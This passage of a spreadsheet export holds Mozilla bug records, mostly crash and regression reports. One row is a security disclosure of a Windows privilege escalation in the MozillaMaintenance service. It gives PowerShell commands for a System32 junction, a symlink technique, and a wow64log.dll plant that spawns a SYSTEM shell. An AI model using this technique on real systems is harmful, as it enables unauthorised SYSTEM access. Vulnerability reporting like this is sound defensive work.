      <c r="W4857" t="inlineStr">
        <is>
          <t>Steps to reproduce:
On git commit 0816653c3ab851fa0e362eaec48c643fb764eaf4 the attached (flaky) sample crashes with one of two assertion violation.
I observed `js::Mutex::assertOwnedByCurrentThread at js/src/threading/Mutex.cpp:73` when reproducing with rr --chaos and
`Assertion failure: kind == JS::TracerKind::Tenuring || kind == JS::TracerKind::MinorSweeping || kind == JS::TracerKind::Moving, at gc/Marking.cpp:137` when running without an attached debugger.
The sample is invoked as `obj-x86_64-pc-linux-gnu/dist/bin/js --baseline-warmup-threshold=10 --ion-warmup-threshold=100 --fuzzing-safe --small-function-length=512 --inlining-entry-threshold=16 --gc-zeal=10 crash.js`
The crash is quite flaky; it takes a couple of dozens of execution until the crash manifests. I failed to further minimize the sample, sorry about that.
Furthermore, I only observed the crash in an optimized build; the mozconfig file is attached.
If you cannot reproduce the crash locally I'll upload a pernosco session.
```
#0  js::Mutex::assertOwnedByCurrentThread (this=0x551e58e26c68)
    at js/src/threading/Mutex.cpp:73
#1  0x000056358f6a4536 in js::gc::StoreBuffer::unput&lt;js::gc::StoreBuffer::MonoTypeBuffer&lt;js::gc::StoreBuffer::CellPtrEdge&lt;JSString&gt; &gt;, js::gc::StoreBuffer::CellPtrEdge&lt;JSString&gt; &gt; (buffer=...,
    edge=..., this=&lt;optimized out&gt;) at js/src/gc/StoreBuffer.h:409
#2  js::gc::StoreBuffer::unputCell (strp=0x551e58e539e8, this=&lt;optimized out&gt;)
    at js/src/gc/StoreBuffer.h:481
#3  js::gc::PostWriteBarrierImpl&lt;JSString&gt; (cellp=&lt;optimized out&gt;, prev=&lt;optimized out&gt;,
    next=&lt;optimized out&gt;) at js/src/gc/StoreBuffer.h:636
#4  js::gc::PostWriteBarrier&lt;JSString&gt; (vp=&lt;optimized out&gt;, prev=&lt;optimized out&gt;,
    next=&lt;optimized out&gt;) at js/src/gc/StoreBuffer.h:647
#5  js::InternalBarrierMethods&lt;JSString*, void&gt;::postBarrier (vp=&lt;optimized out&gt;,
    prev=&lt;optimized out&gt;, next=&lt;optimized out&gt;)
    at js/src/gc/Barrier.h:349
#6  js::WriteBarriered&lt;JSString*&gt;::post (this=&lt;optimized out&gt;, prev=&lt;optimized out&gt;,
    next=&lt;optimized out&gt;) at js/src/gc/Barrier.h:509
#7  js::HeapPtr&lt;JSString*&gt;::~HeapPtr (this=0x551e58e539e8)
    at js/src/gc/Barrier.h:703
#8  js::RegExpStatics::~RegExpStatics (this=0x551e58e53940)
    at js/src/vm/RegExpStatics.h:17
#9  0x000056358f67ea2d in js_delete&lt;js::RegExpStatics&gt; (p=0x551e58e53940)
    at obj-x86_64-pc-linux-gnu/dist/include/js/Utility.h:566
#10 JS::DeletePolicy&lt;js::RegExpStatics&gt;::operator() (this=&lt;optimized out&gt;, ptr=0x551e58e53940)
    at obj-x86_64-pc-linux-gnu/dist/include/js/Utility.h:639
#11 mozilla::UniquePtr&lt;js::RegExpStatics, JS::DeletePolicy&lt;js::RegExpStatics&gt; &gt;::reset (
    this=0x551e58ec3ed0, aPtr=0x0)
    at obj-x86_64-pc-linux-gnu/dist/include/mozilla/UniquePtr.h:301
#12 mozilla::UniquePtr&lt;js::RegExpStatics, JS::DeletePolicy&lt;js::RegExpStatics&gt; &gt;::~UniquePtr (
    this=0x551e58ec3ed0)
    at obj-x86_64-pc-linux-gnu/dist/include/mozilla/UniquePtr.h:249
#13 js::GlobalObjectData::~GlobalObjectData (this=0x551e58ec3800)
    at js/src/vm/GlobalObject.cpp:1002
#14 JS::GCContext::delete_&lt;js::GlobalObjectData&gt; (this=0x551e58e23740, cell=0x1d29829ab240, 
    p=0x551e58ec3800, nbytes=1808, use=js::MemoryUse::GlobalObjectData)
    at js/src/gc/GCContext.h:163
#15 JS::GCContext::delete_&lt;js::GlobalObjectData&gt; (this=0x551e58e23740, cell=0x1d29829ab240,
    p=0x551e58ec3800, use=js::MemoryUse::GlobalObjectData)
    at js/src/gc/GCContext.h:151
#16 js::GlobalObject::releaseData (this=0x1d29829ab240, gcx=0x551e58e23740)
    at js/src/vm/GlobalObject.cpp:997
#17 0x000056358fecc1ef in js::gc::GCRuntime::sweepRealmGlobals (this=0x551e58e23728)
    at js/src/gc/Sweeping.cpp:1233
#18 js::gc::GCRuntime::beginSweepingSweepGroup (this=0x551e58e23728, gcx=0x551e58e23740,
    budget=...) at js/src/gc/Sweeping.cpp:1570
#19 0x000056358fef1481 in sweepaction::SweepActionSequence::run (this=0x551e58e06970, args=...)
    at js/src/gc/Sweeping.cpp:2165
#20 0x000056358feeca00 in sweepaction::SweepActionForEach&lt;js::gc::SweepGroupsIter, JSRuntime*&gt;::run (this=0x551e58e1a100, args=...) at js/src/gc/Sweeping.cpp:2200
#21 0x000056358fed4cda in js::gc::GCRuntime::performSweepActions (this=0x551e58e23728,
    budget=...) at js/src/gc/Sweeping.cpp:2342
#22 0x000056358fe13dd2 in js::gc::GCRuntime::incrementalSlice (this=0x551e58e23728, budget=...,
    reason=JS::GCReason::DESTROY_RUNTIME, budgetWasIncreased=&lt;optimized out&gt;)
    at js/src/gc/GC.cpp:3670
#23 0x000056358fe19bfa in js::gc::GCRuntime::gcCycle (this=0x551e58e23728,
    nonincrementalByAPI=&lt;optimized out&gt;, budgetArg=..., reason=JS::GCReason::DESTROY_RUNTIME)
    at js/src/gc/GC.cpp:4181
#24 0x000056358fe1b670 in js::gc::GCRuntime::collect (this=0x551e58e23728,
    nonincrementalByAPI=&lt;optimized out&gt;, budget=..., reason=JS::GCReason::DESTROY_RUNTIME)
    at js/src/gc/GC.cpp:4372
#25 0x000056358fde06aa in js::gc::GCRuntime::gc (this=0x551e58e23728,
    options=JS::GCOptions::Shutdown, reason=JS::GCReason::DESTROY_RUNTIME)
    at js/src/gc/GC.cpp:4449
#26 0x000056358f846848 in JSRuntime::destroyRuntime (this=0x551e58e23000)
    at js/src/vm/Runtime.cpp:266
#27 0x000056358f6c4a91 in js::DestroyContext (cx=0x551e58e31500)
    at js/src/vm/JSContext.cpp:222
#28 0x000056358f3b01d4 in JS_DestroyContext (cx=0x551e58e31500)
    at js/src/jsapi.cpp:405
#29 main::$_2::operator() (this=&lt;optimized out&gt;)
    at js/src/shell/js.cpp:11283
#30 mozilla::ScopeExit&lt;main::$_2&gt;::~ScopeExit (this=&lt;optimized out&gt;)
    at obj-x86_64-pc-linux-gnu/dist/include/mozilla/ScopeExit.h:106
#31 main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;)
    at js/src/shell/js.cpp:11404
```</t>
        </is>
      </c>
      <c r="X4857" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4858">
      <c r="A4858" t="n">
        <v>871402</v>
      </c>
      <c r="B4858" t="inlineStr">
        <is>
          <t>2013-05-12 21:20:16 -0700</t>
        </is>
      </c>
      <c r="C4858" t="inlineStr">
        <is>
          <t>[STK] launch browser doesn't work properly</t>
        </is>
      </c>
      <c r="D4858" t="inlineStr">
        <is>
          <t>2013-07-12 13:49:02 -0700</t>
        </is>
      </c>
      <c r="E4858" t="n">
        <v>1</v>
      </c>
      <c r="F4858" t="n">
        <v>1</v>
      </c>
      <c r="G4858" t="n">
        <v>6</v>
      </c>
      <c r="H4858" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4858" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4858" t="inlineStr">
        <is>
          <t>Gaia::Settings</t>
        </is>
      </c>
      <c r="K4858" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4858" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4858" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4858" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4858" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4858" t="inlineStr">
        <is>
          <t>[TD-10819]</t>
        </is>
      </c>
      <c r="Q4858" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4858" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4858" t="inlineStr">
        <is>
          <t>1.1 QE3 (26jun)</t>
        </is>
      </c>
      <c r="T4858" t="n">
        <v>1</v>
      </c>
      <c r="U4858" t="n">
        <v>0</v>
      </c>
      <c r="V4858" t="n">
        <v>22</v>
      </c>
      <c r="W4858" t="inlineStr">
        <is>
          <t>Created attachment 748640
attach file include main, radio log and video
From attached logs,  when the launch browser command is executed,  it seems that  browser is launched. However, settings app is immediately brought again to foreground. (may be due to some STK commands, not sure though)</t>
        </is>
      </c>
      <c r="X4858" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4859">
      <c r="A4859" t="n">
        <v>1391042</v>
      </c>
      <c r="B4859" t="inlineStr">
        <is>
          <t>2017-08-16 13:13:23 -0700</t>
        </is>
      </c>
      <c r="C4859" t="inlineStr">
        <is>
          <t>TypeError: this.appMenuStatus is null in browser-sync</t>
        </is>
      </c>
      <c r="D4859" t="inlineStr">
        <is>
          <t>2017-08-17 04:20:36 -0700</t>
        </is>
      </c>
      <c r="E4859" t="n">
        <v>1</v>
      </c>
      <c r="F4859" t="n">
        <v>1</v>
      </c>
      <c r="G4859" t="n">
        <v>2</v>
      </c>
      <c r="H4859" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4859" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4859" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K4859" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4859" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4859" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4859" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4859" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4859" t="inlineStr"/>
      <c r="Q4859" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4859" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4859" t="inlineStr">
        <is>
          <t>Firefox 57</t>
        </is>
      </c>
      <c r="T4859" t="n">
        <v>1</v>
      </c>
      <c r="U4859" t="n">
        <v>0</v>
      </c>
      <c r="V4859" t="n">
        <v>7</v>
      </c>
      <c r="W4859" t="inlineStr">
        <is>
          <t>This is a regression from bug 1390273, turns out |!window.toolbar.visible| also helped with the macOS hidden window.</t>
        </is>
      </c>
      <c r="X4859" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4860">
      <c r="A4860" t="n">
        <v>1162947</v>
      </c>
      <c r="B4860" t="inlineStr">
        <is>
          <t>2015-05-08 06:03:52 -0700</t>
        </is>
      </c>
      <c r="C4860" t="inlineStr">
        <is>
          <t>buildapi.py doesn't skip bad jobs properly</t>
        </is>
      </c>
      <c r="D4860" t="inlineStr">
        <is>
          <t>2015-12-21 08:28:47 -0800</t>
        </is>
      </c>
      <c r="E4860" t="n">
        <v>1</v>
      </c>
      <c r="F4860" t="n">
        <v>1</v>
      </c>
      <c r="G4860" t="n">
        <v>7</v>
      </c>
      <c r="H4860" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4860" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J4860" t="inlineStr">
        <is>
          <t>Treeherder: Data Ingestion</t>
        </is>
      </c>
      <c r="K4860" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L4860" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4860" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4860" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4860" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4860" t="inlineStr"/>
      <c r="Q4860" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4860" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4860" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4860" t="n">
        <v>1</v>
      </c>
      <c r="U4860" t="n">
        <v>0</v>
      </c>
      <c r="V4860" t="n">
        <v>4</v>
      </c>
      <c r="W4860" t="inlineStr">
        <is>
          <t>As part of builds-{pending,running,4hr}.js ingestion in buildapi.py, we check to see if each job has the expected properties, and if not the job is skipped and a warning output to the console.
Simple right?
Except we have two loops through each dataset: one to make a list of the repo-revision combos (so we can look them up in one go, for perf) and one to then actually handle the jobs. We only skip the job in the first loop and not the second.
This doesn't cause massive breakage, since we fortunately hit a KeyError - eg for builds-4hr that's here:
https://github.com/mozilla/treeherder/blob/bbc0c2e0e77044ca5cee7610481b337d788c0852/treeherder/etl/buildapi.py#L159
However by that point (from what I can see at least), we've still scheduled the fetch-missing-pushlogs task unnecessarily.
One of the things that makes it so hard trying to sift through buildapi.py to figure out what's going on (eg for this bug, bug 1162868, bug 1162526, bug 1090289 and others), is that there is a great amount of duplication in that file.
I know ideally much (or all) of buildapi.py will be going away at some distant point in the future, but we're continually hitting data integrity issues with the releng data sources (the latest of which being bug 1162868) so I think it's worth doing some cleanup now anyway.</t>
        </is>
      </c>
      <c r="X4860" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4861">
      <c r="A4861" t="n">
        <v>1481907</v>
      </c>
      <c r="B4861" t="inlineStr">
        <is>
          <t>2018-08-08 12:09:10 -0700</t>
        </is>
      </c>
      <c r="C4861" t="inlineStr">
        <is>
          <t>MozillaMaintenance service arbitrary file creation privilege escalation on Windows</t>
        </is>
      </c>
      <c r="D4861" t="inlineStr">
        <is>
          <t>2024-05-30 09:47:37 -0700</t>
        </is>
      </c>
      <c r="E4861" t="n">
        <v>1</v>
      </c>
      <c r="F4861" t="n">
        <v>1</v>
      </c>
      <c r="G4861" t="n">
        <v>3</v>
      </c>
      <c r="H4861" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4861" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4861" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K4861" t="inlineStr">
        <is>
          <t>61 Branch</t>
        </is>
      </c>
      <c r="L4861" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4861" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N4861" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4861" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4861" t="inlineStr">
        <is>
          <t>[adv-main62-][adv-esr60.2-][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4861" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4861" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4861" t="inlineStr">
        <is>
          <t>mozilla63</t>
        </is>
      </c>
      <c r="T4861" t="n">
        <v>1</v>
      </c>
      <c r="U4861" t="n">
        <v>0</v>
      </c>
      <c r="V4861" t="n">
        <v>43</v>
      </c>
      <c r="W4861" t="inlineStr">
        <is>
          <t>Created attachment 8998602
Proof of concept (source and binaries)
SUMMARY
The the privileged status/log file creation performed by the MozillaMaintenance update service on Windows can be abused to create arbitrary files with write access. This can be used by an unprivileged user to obtain SYSTEM privileges.
VERSION
Firefox Version tested: 61.0.1 stable
MozillaMaintenance service version: 61.0.1.6759
Operating System: Windows 10 1803 (10.0.17134.112) x64
VULNERABILITY DETAILS
The MozillaMaintenance service creates files in a user-provided update location:
- maintenanceservice.exe creates an update.status file when it runs alone (no updater.exe)
- (Firefox's) updater.exe creates update.status and update.log
These files are actually created as temporary files via GetTempFileName (with 'svc', 'sta' and 'log' prefixes respectively + 3 or 4 hexadecimal digits + '.tmp' extension), then renamed/moved.
They are created and renamed/moved with SYSTEM privileges, without impersonation, in a user-provided directory (absolute path that must end with ...\updates\0).
This can be abused by an unprivileged user to create files as SYSTEM.
Indeed, because the user has control over the directory where these operations take place, an unprivileged user can change it to an NTFS junction that points to an arbitrary directory like C:\Windows\System32, and/or change its content to links targeting other files.
A quick illustration of this problem can be obtained with the following PowerShell commands:
New-Item -Type Junction -Force -Path C:\Temp\updates\0 -Value C:\Windows\System32
(Get-Service MozillaMaintenance).Start(@("MozillaMaintenance", "software-update", "updater.exe", "C:\Temp\updates\0", "C:\X", "C:\X"))
The above commands make the MozillaMaintenance service create an update.status file in C:\Windows\System32, because C:\Temp\updates\0 "points to" (reparses to) that directory.
Now, creating files with no control over the content isn't really that interesting, so we have to do it in a way that gives us control over the content and (optionally) the path of the resulting file.
One way to do this is by using symbolic links with the name of the manipulated files, e.g. predict/bruteforce the name of the temporary file (or change its content before the rename/move operation), and use a link with the name of the final file to choose the destination path.
Unprivileged users can't create "real" NTFS symbolic links on the filesystem by default, but they can create something close enough to work in most instances (including this case), by leveraging a technique found by James Forshaw of Google Project Zero.
Indeed, the parent directory (some\path\updates\0 in our case) can be made a junction to the \RPC Control\ object directory, where users can create symbolic link with arbitrary name and target path. The CreateFile call will reparse as needed (one time for the junction and another for the symlink), resulting in the application opening the desired file.
So, with the following setup:
C:\Temp\updates\0 -&gt; \RPC Control\ (NTFS junction)
\RPC Control\update.status -&gt; C:\Windows\System32\evil.dll (object manager symbolic link)
A CreateFile operation on C:\Temp\updates\0\update.status will actually open the file C:\Windows\System32\evil.dll
By making the temporary file creation in a user-writable location, before moving it to System32, we keep the file's access rights, so its content can then be replaced at will after it has moved to System32 even from our unprivileged user account.
We also need to create a symbolic link for the temporary file. The additional benefit of using object manager symlinks is that we don't have to guess or "bruteforce" the name of the temporary file. Indeed, the temporary file name creation (GetTempFileName), will cycle through 0000-FFFF for us when trying to create the name svcXXXX.tmp, as it gets REPARSE results when there is no symlink in \RPC Control\ with that name, because of the way GetTempFileName works.
So we just have to create one single link, e.g. svcAAAA.tmp, pointing to a file that does not yet exist in a user-writable location (C:\Temp\updates\moz_svc.tmp in the PoC).
Once these links are set up, we just have to call the MozillaMaintenance service with our trap directory to have it create our target file (arbitrary path) with SYSTEM privileges, and then we can replace its content with our evil payload (arbitrary content).
There are several ways to escalate privileges given an arbitrary file creation, for this PoC I chose to create the wow64log.dll file in C:\Windows\System32, which on x64 systems is loaded in 32-bits WOW64 processes. Because the MozillaMaintenance executable is 32-bits, we just start the service a second time to have it load the DLL and run our payload as SYSTEM.
PROOF OF CONCEPT
I've provided a PoC that implement the above step in order to spawn a shell running as SYSTEM from an unprivileged user session.
This PoC has the following components:
- CreateSymlink.exe: a tool by James Forshaw that implements the pseudo-symlink technique described above. Part of https://github.com/google/symboliclink-testing-tools
- wow64log.dll: the DLL that gets written to System32, gets loaded in MM service, and runs our final payload (SpawnShell.exe) with SYSTEM privileges (before the service trims down its privileges)
- SpawnShell.exe: the payload, spawns a SYSTEM shell in the user's session
- poc.ps1: a PowerShell scripts to automate the attack
I've separated the arbitrary file creation and its use for privilege escalation into 2 functions in the script, so that you can reproduce the former without the latter if you'd like to.
Usage instructions:
1) Unzip the poc
2) Execute the poc.ps1 PowerShell script by running the command "powershell -exec bypass path\to\poc.ps1" (or right-clicking on poc.ps1 in explorer and choosing "Run with PowerShell")
Tested on Windows 10 1703 &amp; 1803 x64</t>
        </is>
      </c>
      <c r="X4861" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4862">
      <c r="A4862" t="n">
        <v>594760</v>
      </c>
      <c r="B4862" t="inlineStr">
        <is>
          <t>2010-09-09 07:05:29 -0700</t>
        </is>
      </c>
      <c r="C4862" t="inlineStr">
        <is>
          <t>activeContent in nsEventStateManager::PostHandleEvent looks unsafe</t>
        </is>
      </c>
      <c r="D4862" t="inlineStr">
        <is>
          <t>2010-10-30 18:13:17 -0700</t>
        </is>
      </c>
      <c r="E4862" t="n">
        <v>1</v>
      </c>
      <c r="F4862" t="n">
        <v>1</v>
      </c>
      <c r="G4862" t="n">
        <v>3</v>
      </c>
      <c r="H4862" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4862" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4862" t="inlineStr">
        <is>
          <t>DOM: Events</t>
        </is>
      </c>
      <c r="K4862" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4862" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4862" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4862" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4862" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4862" t="inlineStr">
        <is>
          <t>[sg:critical?][critsmash:patch]</t>
        </is>
      </c>
      <c r="Q4862" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4862" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4862" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4862" t="n">
        <v>1</v>
      </c>
      <c r="U4862" t="n">
        <v>0</v>
      </c>
      <c r="V4862" t="n">
        <v>3</v>
      </c>
      <c r="W4862" t="inlineStr">
        <is>
          <t>Created attachment 473527
patch
The variable is nsIContent*, but scripts may run before it is used.
I don't have a testcase, but based on code this might lead to crash when
using image maps and deleting the image element when it gets focus.
Or something like that.</t>
        </is>
      </c>
      <c r="X4862" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4863">
      <c r="A4863" t="n">
        <v>642338</v>
      </c>
      <c r="B4863" t="inlineStr">
        <is>
          <t>2011-03-16 17:53:41 -0700</t>
        </is>
      </c>
      <c r="C4863" t="inlineStr">
        <is>
          <t>crash [@ nsBarProp::GetVisibleByFlag(int*, unsigned int)]</t>
        </is>
      </c>
      <c r="D4863" t="inlineStr">
        <is>
          <t>2020-09-24 02:02:26 -0700</t>
        </is>
      </c>
      <c r="E4863" t="n">
        <v>1</v>
      </c>
      <c r="F4863" t="n">
        <v>1</v>
      </c>
      <c r="G4863" t="n">
        <v>3</v>
      </c>
      <c r="H4863" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4863" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4863" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4863" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4863" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4863" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N4863" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4863" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4863" t="inlineStr">
        <is>
          <t>[sg:critical?] [qa-examined-192] [qa-ntd-192]</t>
        </is>
      </c>
      <c r="Q4863" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4863" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4863" t="inlineStr">
        <is>
          <t>mozilla5</t>
        </is>
      </c>
      <c r="T4863" t="n">
        <v>1</v>
      </c>
      <c r="U4863" t="n">
        <v>1</v>
      </c>
      <c r="V4863" t="n">
        <v>51</v>
      </c>
      <c r="W4863" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-fbfefcf6-c046-436b-97e5-363552110316 .
============================================================= 
33 crashes on the 4.0 RC https://crash-stats.mozilla.com/report/list?product=Firefox&amp;version=Firefox%3A4.0&amp;range_value=1&amp;range_unit=weeks&amp;hang_type=any&amp;process_type=any&amp;plugin_field=&amp;plugin_query_type=&amp;plugin_query=&amp;do_query=1&amp;admin=&amp;signature=nsBarProp%3A%3AGetVisibleByFlag%28int*%2C%20unsigned%20int%29
Opened http://www.weatherunderground.com/cgi-bin/findweather/getForecast?query=02901 then crashed shortly after the page load was done.</t>
        </is>
      </c>
      <c r="X4863" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4864">
      <c r="A4864" t="n">
        <v>737182</v>
      </c>
      <c r="B4864" t="inlineStr">
        <is>
          <t>2012-03-19 13:55:39 -0700</t>
        </is>
      </c>
      <c r="C4864" t="inlineStr">
        <is>
          <t>2D texture corruption on Mac/Intel with large texture sizes &gt;= 4993</t>
        </is>
      </c>
      <c r="D4864" t="inlineStr">
        <is>
          <t>2017-05-07 09:38:41 -0700</t>
        </is>
      </c>
      <c r="E4864" t="n">
        <v>1</v>
      </c>
      <c r="F4864" t="n">
        <v>1</v>
      </c>
      <c r="G4864" t="n">
        <v>3</v>
      </c>
      <c r="H4864" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4864" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4864" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4864" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4864" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4864" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4864" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4864" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4864" t="inlineStr">
        <is>
          <t>[sg:vector-high]</t>
        </is>
      </c>
      <c r="Q4864" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4864" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4864" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T4864" t="n">
        <v>1</v>
      </c>
      <c r="U4864" t="n">
        <v>0</v>
      </c>
      <c r="V4864" t="n">
        <v>47</v>
      </c>
      <c r="W4864" t="inlineStr">
        <is>
          <t>Created attachment 607300
Image corruption image
When I go to: http://www.dannijo.com/product_info.php?products_id=766 and click on the image to view details, check the file I attached to see what happens:
Hardware Info:
11" Macbook Air - Mid 2011
Graphics  Intel HD Graphics 3000 384 MB
Software  Mac OS X Lion 10.7.3 (11D50b)
Running Firefox 11.0</t>
        </is>
      </c>
      <c r="X4864" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4865">
      <c r="A4865" t="n">
        <v>1072871</v>
      </c>
      <c r="B4865" t="inlineStr">
        <is>
          <t>2014-09-25 03:13:59 -0700</t>
        </is>
      </c>
      <c r="C4865" t="inlineStr">
        <is>
          <t>IPC: heap-use-after-free crash [@mozilla::gfx::DrawTargetCG::CopySurface]</t>
        </is>
      </c>
      <c r="D4865" t="inlineStr">
        <is>
          <t>2016-06-04 16:13:15 -0700</t>
        </is>
      </c>
      <c r="E4865" t="n">
        <v>1</v>
      </c>
      <c r="F4865" t="n">
        <v>1</v>
      </c>
      <c r="G4865" t="n">
        <v>3</v>
      </c>
      <c r="H4865" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4865" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4865" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K4865" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4865" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4865" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4865" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4865" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4865" t="inlineStr">
        <is>
          <t>[adv-main35+][b2g-adv-main2.2+]</t>
        </is>
      </c>
      <c r="Q4865" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4865" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4865" t="inlineStr">
        <is>
          <t>mozilla37</t>
        </is>
      </c>
      <c r="T4865" t="n">
        <v>1</v>
      </c>
      <c r="U4865" t="n">
        <v>0</v>
      </c>
      <c r="V4865" t="n">
        <v>21</v>
      </c>
      <c r="W4865" t="inlineStr">
        <is>
          <t>Created attachment 8495158
faulty-CGBlt_copyBytes.txt
This happened while opening http://mozilla.github.io/webrtc-landing/pc_test.html in a build with '--enable-ipc-fuzzer' enabled.</t>
        </is>
      </c>
      <c r="X4865" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4866">
      <c r="A4866" t="n">
        <v>1207298</v>
      </c>
      <c r="B4866" t="inlineStr">
        <is>
          <t>2015-09-22 12:43:52 -0700</t>
        </is>
      </c>
      <c r="C4866" t="inlineStr">
        <is>
          <t>MSan: use-of-uninitialized-value in ReadHuffmanCode</t>
        </is>
      </c>
      <c r="D4866" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:25 -0700</t>
        </is>
      </c>
      <c r="E4866" t="n">
        <v>1</v>
      </c>
      <c r="F4866" t="n">
        <v>1</v>
      </c>
      <c r="G4866" t="n">
        <v>3</v>
      </c>
      <c r="H4866" t="inlineStr">
